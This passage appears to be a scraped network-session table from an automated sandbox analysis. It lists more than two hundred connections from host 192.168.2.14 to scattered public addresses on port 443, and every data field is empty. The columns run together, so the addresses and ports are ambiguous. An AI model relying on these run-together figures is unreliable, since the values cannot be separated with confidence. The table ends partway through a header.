                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18702192.168.2.146002653.60.189.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18703192.168.2.1449068115.249.193.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18704192.168.2.1460584207.95.3.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18705192.168.2.1452834191.171.30.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18706192.168.2.1451884163.46.18.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18707192.168.2.1460318126.109.134.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18708192.168.2.1451778145.33.232.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18709192.168.2.144648466.73.93.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18710192.168.2.143963069.67.190.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18711192.168.2.1457478170.102.5.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18712192.168.2.145850270.4.110.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18713192.168.2.143509482.104.148.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18714192.168.2.1455790190.236.47.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18715192.168.2.1460946199.24.64.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18716192.168.2.143408464.85.52.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18717192.168.2.144449872.142.103.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18718192.168.2.1433296152.107.105.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18719192.168.2.144153282.149.149.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18720192.168.2.1455128149.36.35.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18721192.168.2.1440932140.46.32.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18722192.168.2.1442840112.203.251.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18723192.168.2.1460184211.48.176.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18724192.168.2.145256417.175.113.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18725192.168.2.143287050.228.29.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18726192.168.2.1440020156.24.234.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18727192.168.2.144764635.55.140.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18728192.168.2.1454822107.129.29.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18729192.168.2.143951272.1.112.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18730192.168.2.143966059.157.129.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18731192.168.2.143676814.101.128.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18732192.168.2.145711625.70.166.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18733192.168.2.1457956197.78.67.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18734192.168.2.1438280216.163.253.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18735192.168.2.146099699.210.42.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18736192.168.2.144121612.218.47.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18737192.168.2.145085025.27.101.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18738192.168.2.145363844.24.253.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18739192.168.2.1450912101.26.214.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18740192.168.2.14561885.85.31.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18741192.168.2.1451118189.90.223.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18742192.168.2.144643223.148.34.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18743192.168.2.1452242167.19.134.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18744192.168.2.1433320112.200.112.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18745192.168.2.1458764179.155.6.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18746192.168.2.1442984140.255.246.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18747192.168.2.1444604135.112.197.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18748192.168.2.1447484192.30.74.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18749192.168.2.1444388133.251.17.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18750192.168.2.144536062.197.96.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18751192.168.2.1437950185.75.86.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18752192.168.2.1434840181.141.116.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18753192.168.2.1436404164.81.4.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18754192.168.2.144040459.0.204.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18755192.168.2.1457528196.65.138.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18756192.168.2.1440104116.127.154.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18757192.168.2.1441740105.163.125.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18758192.168.2.1448970105.43.172.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18759192.168.2.1435440213.28.63.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18760192.168.2.1440774160.18.199.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18761192.168.2.145726494.59.164.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18762192.168.2.1446414169.147.115.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18763192.168.2.14535102.101.202.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18764192.168.2.1437324157.101.5.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18765192.168.2.1435128169.112.180.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18766192.168.2.145490652.98.50.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18767192.168.2.1444354115.135.73.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18768192.168.2.1449172137.141.107.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18769192.168.2.144364893.122.95.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18770192.168.2.145267066.167.252.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18771192.168.2.1437066202.134.238.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18772192.168.2.14360565.31.123.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18773192.168.2.143794079.17.166.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18774192.168.2.14513225.120.224.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18775192.168.2.1444054205.183.1.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18776192.168.2.1434242116.219.101.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18777192.168.2.1436010170.32.7.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18778192.168.2.1433916148.174.62.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18779192.168.2.144785617.219.58.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18780192.168.2.1452154222.30.210.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18781192.168.2.1444462207.1.15.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18782192.168.2.1449236137.73.88.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18783192.168.2.1442048109.200.63.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18784192.168.2.145293671.116.102.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18785192.168.2.1441658193.224.186.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18786192.168.2.1436472198.202.97.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18787192.168.2.143933263.193.108.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18788192.168.2.1438484124.208.132.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18789192.168.2.144031097.192.46.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18790192.168.2.1440134220.134.2.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18791192.168.2.1438880121.252.167.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18792192.168.2.1439278117.49.242.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18793192.168.2.1434124197.191.193.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18794192.168.2.1434946132.157.117.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18795192.168.2.145800452.117.183.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18796192.168.2.1445632169.95.179.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18797192.168.2.145040687.251.181.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18798192.168.2.144585220.13.159.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18799192.168.2.1436934213.171.24.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18800192.168.2.1455808145.15.42.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18801192.168.2.144955277.223.120.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18802192.168.2.143830060.178.93.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18803192.168.2.1456136109.10.100.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18804192.168.2.145321051.41.29.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18805192.168.2.146092219.143.211.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18806192.168.2.145722817.200.242.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18807192.168.2.1455444208.74.69.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18808192.168.2.1457546188.183.64.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18809192.168.2.143930853.12.81.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18810192.168.2.144715449.174.66.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18811192.168.2.1451278155.69.174.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18812192.168.2.1437644148.153.19.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18813192.168.2.145782441.218.110.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18814192.168.2.1433160195.62.57.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18815192.168.2.143583092.116.108.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18816192.168.2.1460300199.254.48.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18817192.168.2.1437600141.78.254.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18818192.168.2.1454560197.244.67.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18819192.168.2.1439364204.143.135.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18820192.168.2.1439348204.181.123.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18821192.168.2.145466267.142.252.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18822192.168.2.143565414.206.81.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18823192.168.2.1443782221.171.120.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18824192.168.2.14594409.126.126.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18825192.168.2.1440828194.237.228.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18826192.168.2.1443942139.64.147.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18827192.168.2.146077224.123.140.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18828192.168.2.1440134147.38.154.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18829192.168.2.1459794156.63.130.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18830192.168.2.1456000142.3.199.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18831192.168.2.1441054139.67.252.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18832192.168.2.144418495.5.229.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18833192.168.2.14416601.107.246.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18834192.168.2.144246214.42.39.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18835192.168.2.1458492164.81.17.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18836192.168.2.1436874155.202.139.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18837192.168.2.143800666.25.114.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18838192.168.2.143500468.244.149.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18839192.168.2.1446888173.39.53.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18840192.168.2.145324688.198.236.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18841192.168.2.144606082.81.83.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18842192.168.2.1454100188.182.182.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18843192.168.2.1450216218.157.253.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18844192.168.2.145798669.240.21.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18845192.168.2.143929647.131.255.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18846192.168.2.1450642141.72.49.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18847192.168.2.1440300149.11.168.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18848192.168.2.1433440197.52.147.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18849192.168.2.1448038146.27.78.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18850192.168.2.145743423.128.196.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18851192.168.2.1436888116.177.14.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18852192.168.2.1439730164.126.34.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18853192.168.2.1440010204.225.154.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18854192.168.2.1439180123.221.73.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18855192.168.2.1450832109.17.120.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18856192.168.2.145397613.170.109.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18857192.168.2.145940459.104.226.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18858192.168.2.14385222.26.203.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18859192.168.2.1434914113.53.161.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18860192.168.2.144465864.36.35.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18861192.168.2.1433186150.45.161.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18862192.168.2.14353582.42.36.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18863192.168.2.1445146160.193.246.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18864192.168.2.144859085.100.236.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18865192.168.2.1457260147.159.206.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18866192.168.2.1449636203.52.112.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18867192.168.2.145798073.151.186.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18868192.168.2.1440640219.97.4.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18869192.168.2.144454843.94.16.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18870192.168.2.1446912200.249.3.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18871192.168.2.1458836204.217.13.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18872192.168.2.143338635.254.37.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18873192.168.2.143892648.114.66.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18874192.168.2.145155853.49.131.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18875192.168.2.1451216180.48.39.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18876192.168.2.144482058.52.123.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18877192.168.2.1441936198.71.128.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18878192.168.2.143279861.244.49.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18879192.168.2.1445626150.69.237.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18880192.168.2.1441080186.125.133.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18881192.168.2.1441424208.119.64.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18882192.168.2.143746020.195.135.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18883192.168.2.1439830119.132.197.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18884192.168.2.1437770210.136.85.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18885192.168.2.1440422216.251.213.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18886192.168.2.1455250149.24.113.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18887192.168.2.1455596217.89.189.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18888192.168.2.1452756138.111.140.252443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18889192.168.2.1450704128.123.40.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18890192.168.2.145565850.225.229.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18891192.168.2.1458470182.1.42.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18892192.168.2.145219663.11.134.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18893192.168.2.1448902221.125.43.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18894192.168.2.144194840.186.173.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18895192.168.2.145215220.231.161.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18896192.168.2.1435974144.72.22.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18897192.168.2.143406419.16.184.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18898192.168.2.1456098159.23.247.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18899192.168.2.144576885.184.210.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18900192.168.2.14359641.36.117.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18901192.168.2.1443898106.246.170.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18902192.168.2.1449108100.227.199.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18903192.168.2.14382925.214.26.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18904192.168.2.1457682179.119.123.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18905192.168.2.1435538123.65.25.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18906192.168.2.144678483.46.193.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18907192.168.2.1451956147.170.255.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18908192.168.2.1459742116.114.26.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18909192.168.2.143932076.21.80.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18910192.168.2.1454390176.202.200.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18911192.168.2.146051299.246.132.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18912192.168.2.1452166190.138.87.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18913192.168.2.1433622164.231.136.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
